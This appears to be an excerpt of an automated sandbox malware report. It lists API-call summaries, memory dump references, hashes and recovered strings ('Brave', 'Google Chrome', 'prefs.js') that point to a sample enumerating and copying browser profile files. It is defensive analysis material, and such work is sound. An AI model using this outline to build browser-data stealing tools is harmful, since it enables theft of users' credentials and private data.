                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 79f41c3d0d6c3761b6172f98091c4048338c044c777434d7ef4abedd42586b19
                                  • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                  • Opcode Fuzzy Hash: 79f41c3d0d6c3761b6172f98091c4048338c044c777434d7ef4abedd42586b19
                                  • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                  APIs
                                  • wsprintfA.USER32 ref: 0041492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 8b6f204cd57e663896ee5bd1383561da935646355c595d5eb662a7fca057069e
                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                  • Opcode Fuzzy Hash: 8b6f204cd57e663896ee5bd1383561da935646355c595d5eb662a7fca057069e
                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                  APIs
                                  • wsprintfA.USER32 ref: 022B3B33
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022B3B4A
                                  • lstrcat.KERNEL32(?,?), ref: 022B3B9C
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 022B3BAE
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 022B3BC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022B3ECE
                                  • FindClose.KERNEL32(000000FF), ref: 022B3EE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 1125553467-0
                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                  • Instruction ID: e8385845afe777881c6c2d0de7f9ce8508f67fe3b881a152a7c1f8046b30e495
                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                  • Instruction Fuzzy Hash: 5FA18EB5A50218ABDB35DFE4CC84FEE737ABF49300F044589A60D96144DB74AB84CF62
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                  • wsprintfA.USER32 ref: 004145A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                  • lstrcatA.KERNEL32(?,00750258,?,00000104), ref: 004146C5
                                  • lstrcatA.KERNEL32(?,00781B78), ref: 004146D8
                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 13328894-2848263008
                                  • Opcode ID: caf8461000e547f1530a018db9dd4cc2f00cb96c8f1fced345ef2e187e5a30a7
                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                  • Opcode Fuzzy Hash: caf8461000e547f1530a018db9dd4cc2f00cb96c8f1fced345ef2e187e5a30a7
                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                  APIs
                                  • wsprintfA.USER32 ref: 022B4B93
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022B4BAA
                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022B4BD8
                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022B4BEE
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022B4DE4
                                  • FindClose.KERNEL32(000000FF), ref: 022B4DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                  • Instruction ID: d4900562ca4e65d8dbafdc15df7fb24cae1a49737de020905a93ae6515c80f57
                                  • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                  • Instruction Fuzzy Hash: D16183B6950219ABCB20EFE0DD88FEA73BDFF49700F00458CA60992145EB75A785CF91
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022AC15C
                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 022AC1B4
                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 022AC1CA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022ACA26
                                  • FindClose.KERNEL32(000000FF), ref: 022ACA38
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                  • Instruction ID: aff6453a3406da53a114b3124054e87eafad49fa950f6e8dac8fc6fd04508fa7
                                  • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                  • Instruction Fuzzy Hash: 84427372A20304ABCB15FBF4DD95EED737AAF95340F40415DA50AA6188EF34AB48CF61
                                  APIs
                                  • wsprintfA.USER32 ref: 00413EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: ee542d5114ce319572a734a5905d40e323a44990baf9728e3ccc04902c83c687
                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                  • Opcode Fuzzy Hash: ee542d5114ce319572a734a5905d40e323a44990baf9728e3ccc04902c83c687
                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022B47E7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B47EE
                                  • wsprintfA.USER32 ref: 022B480D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022B4824
                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022B4852
                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022B4868
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022B48F2
                                  • FindClose.KERNEL32(000000FF), ref: 022B4907
                                  • lstrcat.KERNEL32(?,0064A524), ref: 022B492C
                                  • lstrcat.KERNEL32(?,0064A22C), ref: 022B493F
                                  • lstrlen.KERNEL32(?), ref: 022B494C
                                  • lstrlen.KERNEL32(?), ref: 022B495D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID:
                                  • API String ID: 671575355-0
                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                  • Instruction ID: 9abbf5da98660769c63fc6eece4e9fb95da42ab9efbf8e19c1502e26fc917ddd
                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                  • Instruction Fuzzy Hash: 195194B5590218ABCB24EBF0DC98FED737DAF58300F404588E64D92194DB749B84CF92
                                  APIs
                                  • wsprintfA.USER32 ref: 022B412A
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022B4141
                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022B416F
                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022B4185
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022B42D3
                                  • FindClose.KERNEL32(000000FF), ref: 022B42E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                  • Instruction ID: 7a6934e0bddac05f7ba7e25fc39e7ef97a732df0b2c5f04efa9b8fb1dff86303
                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                  • Instruction Fuzzy Hash: 615170B6920218BBCB25FBF0DC84EEE737DBF48300F004589A64996044EB75AB85CF95
                                  APIs
                                  • wsprintfA.USER32 ref: 0040ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: aaef0a01aba009eb9ef093bdee74fb80829dc0598d01aa172c0e8bd003938d0c
                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                  • Opcode Fuzzy Hash: aaef0a01aba009eb9ef093bdee74fb80829dc0598d01aa172c0e8bd003938d0c
                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: 4@$\*.*
                                  • API String ID: 2325840235-1993203227
                                  • Opcode ID: 40323c941dc43f3aa4a48a3986d26ca72e2a529551c594c10e828831c2f82050
                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                  • Opcode Fuzzy Hash: 40323c941dc43f3aa4a48a3986d26ca72e2a529551c594c10e828831c2f82050
                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: f5f4109695479c4be9dbbc3a317f05dd97d159bc4f1a5a6ce1e8ad3b9d7fb5b5
                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                  • Opcode Fuzzy Hash: f5f4109695479c4be9dbbc3a317f05dd97d159bc4f1a5a6ce1e8ad3b9d7fb5b5
                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 8b97a2c9a29bff876676fca5926e7f77c2165cdbe26687a25fa39450f0f85d83
                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                  • Opcode Fuzzy Hash: 8b97a2c9a29bff876676fca5926e7f77c2165cdbe26687a25fa39450f0f85d83
                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                  APIs
                                  • wsprintfA.USER32 ref: 022AEFA5
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022AEFBC
                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 022AF012
                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 022AF028
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022AF515
                                  • FindClose.KERNEL32(000000FF), ref: 022AF52A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                  • Instruction ID: a21d73748e693dad3bc26aae60805a53d9dea4a340c1e8470c69d5f43df8ecc5
                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                  • Instruction Fuzzy Hash: C4E12E729213189ADB29FBA4CD51EEE733AAF65340F4041D9B10A62499EF346FC9CF50
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022ADD52
                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 022ADD9A
                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 022ADDB0
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022AE033
                                  • FindClose.KERNEL32(000000FF), ref: 022AE045
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                  • Instruction ID: daff8f7858c8597d6ab8d82128509c5c54dea8aa6e2407a57f3758c1d15c3541
                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                  • Instruction Fuzzy Hash: 3F9196729203049BCB15FBF4DD55DEE737AAF99340F00466CE44A96548EF38AB188FA1
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
